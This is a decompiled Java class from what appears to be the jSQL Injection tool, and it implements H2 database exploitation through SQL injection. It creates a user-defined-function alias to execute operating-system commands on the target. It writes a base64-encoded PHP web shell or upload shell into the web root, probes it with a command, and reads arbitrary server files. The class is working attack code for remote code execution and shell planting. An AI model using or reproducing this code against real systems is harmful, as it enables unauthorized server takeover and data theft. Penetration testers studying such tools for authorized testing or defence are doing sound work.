/*
 * Decompiled with CFR 0.152.
 */
package com.jsql.model.accessible.engine;

import com.jsql.model.InjectionModel;
import com.jsql.model.accessible.ResourceAccess;
import com.jsql.model.accessible.engine.h2.ModelYamlH2;
import com.jsql.model.bean.database.MockElement;
import com.jsql.model.exception.AbstractSlidingException;
import com.jsql.model.exception.JSqlException;
import com.jsql.model.exception.JSqlRuntimeException;
import com.jsql.model.suspendable.Input;
import com.jsql.model.suspendable.SuspendableGetRows;
import com.jsql.util.LogLevelUtil;
import com.jsql.util.StringUtil;
import com.jsql.view.subscriber.Seal;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.net.http.HttpResponse;
import java.util.UUID;
import java.util.function.BinaryOperator;
import org.apache.commons.lang3.RandomStringUtils;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.yaml.snakeyaml.Yaml;

public class ExploitH2 {
    private static final Logger LOGGER = LogManager.getRootLogger();
    private final InjectionModel injectionModel;
    private final ModelYamlH2 modelYaml;

    public ExploitH2(InjectionModel injectionModel) {
        this.injectionModel = injectionModel;
        Yaml yaml = new Yaml();
        this.modelYaml = yaml.loadAs(injectionModel.getMediatorEngine().getH2().instance().getModelYaml().getResource().getExploit(), ModelYamlH2.class);
    }

    public void createUdf() throws JSqlException {
        LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "UDF target requirements: stack query");
        this.injectionModel.injectWithoutIndex(this.modelYaml.getRce().getDropAlias(), "alias#drop");
        this.injectionModel.injectWithoutIndex(this.modelYaml.getRce().getCreateAlias(), "alias#create");
        String result = this.injectionModel.getResourceAccess().getResult(String.format(this.modelYaml.getRce().getRunCmd(), ResourceAccess.WEB_CONFIRM_CMD + "%20"), "body#run-func");
        if (result.contains("133717331")) {
            LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE UDF successful: command execution found");
            this.injectionModel.sendToViews(new Seal.AddTabExploitUdf((command, terminalID) -> this.injectionModel.getResourceAccess().getExploitH2().runRce((String)command, (UUID)terminalID)));
        }
    }

    public String runRce(String command, UUID uuidShell) {
        String result;
        try {
            result = this.injectionModel.getResourceAccess().getResult(String.format(this.modelYaml.getRce().getRunCmd(), command.replace(" ", "%20")), "body#run-func");
        }
        catch (JSqlException e) {
            result = String.format("Command failure: %s\nTry '%s 2>&1' to get a system error message.\n", e.getMessage(), command);
        }
        this.injectionModel.sendToViews(new Seal.GetTerminalResult(uuidShell, result.trim() + "\n"));
        return result;
    }

    public String createWeb(String pathExploit, String urlExploit) {
        LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE Web target requirements: stack query, web+db on same machine, jdbc bridge");
        String bodyExploit = StringUtil.base64Decode(this.injectionModel.getMediatorUtils().propertiesUtil().getProperty("exploit.web")).replace("${shell.lead}", "SqLi").replace("${shell.trail}", "iLQS");
        String nameTable = RandomStringUtils.secure().nextAlphabetic(8);
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getRce().getCreateTable(), nameTable, nameTable, bodyExploit.replace("'", "\"")), "tbl#create");
        String nameExploit = RandomStringUtils.secure().nextAlphabetic(8) + ".php";
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getRce().getScriptSimple(), pathExploit + nameExploit, nameTable), "tbl#dump");
        BinaryOperator biFuncGetRequest = (pathExploitFixed, urlSuccess) -> {
            String result = this.injectionModel.getResourceAccess().callCommand(urlSuccess + "?c=" + ResourceAccess.WEB_CONFIRM_CMD);
            if (!result.contains("133717331")) {
                LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
                return "";
            }
            this.injectionModel.sendToViews(new Seal.AddTabExploitWeb((String)urlSuccess));
            return urlSuccess;
        };
        return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
    }

    public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
        String bodyExploit = StringUtil.base64Decode(this.injectionModel.getMediatorUtils().propertiesUtil().getProperty("exploit.upl")).replace("${shell.lead}", "SqLi").replace("${shell.trail}", "iLQS");
        String nameTable = RandomStringUtils.secure().nextAlphabetic(8);
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getRce().getCreateTable(), nameTable, nameTable, bodyExploit.replace("'", "\"")), "tbl#create");
        String nameExploit = RandomStringUtils.secure().nextAlphabetic(8) + ".php";
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getRce().getScriptSimple(), pathExploit + nameExploit, nameTable), "tbl#dump");
        BinaryOperator biFuncGetRequest = (pathExploitFixed, urlSuccess) -> {
            try (FileInputStream streamToUpload = new FileInputStream(fileToUpload);){
                HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, (String)urlSuccess, streamToUpload);
                if (result.body().contains("SqLiy")) {
                    LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "Upload successful: ack received for {}{}", (Object)pathExploit, (Object)fileToUpload.getName());
                } else {
                    LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Upload failure: missing ack for {}{}", (Object)pathExploit, (Object)fileToUpload.getName());
                }
            }
            catch (InterruptedException e) {
                LOGGER.log(LogLevelUtil.IGNORE, e, (Throwable)e);
                Thread.currentThread().interrupt();
            }
            catch (JSqlException | IOException e) {
                throw new JSqlRuntimeException(e);
            }
            return urlSuccess;
        };
        this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
    }

    public String getRead(String pathFile) throws AbstractSlidingException {
        return new SuspendableGetRows(this.injectionModel).run(new Input(String.format(this.injectionModel.getResourceAccess().getExploitH2().getModelYaml().getFile().getReadFromPath(), pathFile), new String[]{""}, false, 1, MockElement.MOCK, "file#read"));
    }

    public ModelYamlH2 getModelYaml() {
        return this.modelYaml;
    }
}

